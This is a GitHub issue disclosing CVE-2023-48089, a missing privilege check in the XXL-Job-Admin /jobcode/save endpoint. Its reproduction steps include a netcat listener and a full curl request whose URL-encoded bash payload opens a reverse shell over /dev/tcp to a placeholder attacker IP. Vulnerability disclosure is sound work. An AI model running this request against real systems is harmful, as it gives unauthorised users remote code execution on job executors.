CVE-2023-48089: Remote Code Execution in /xxl-job-admin/jobcode/save · Issue #3333 · xuxueli/xxl-job

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.

Steps to reproduce the behavior

Step 1: Create a listener
nc -nlvp 8888

Step 2: Create a unprivileged user and get its cookie

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie “xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>” -d “id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test”

Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.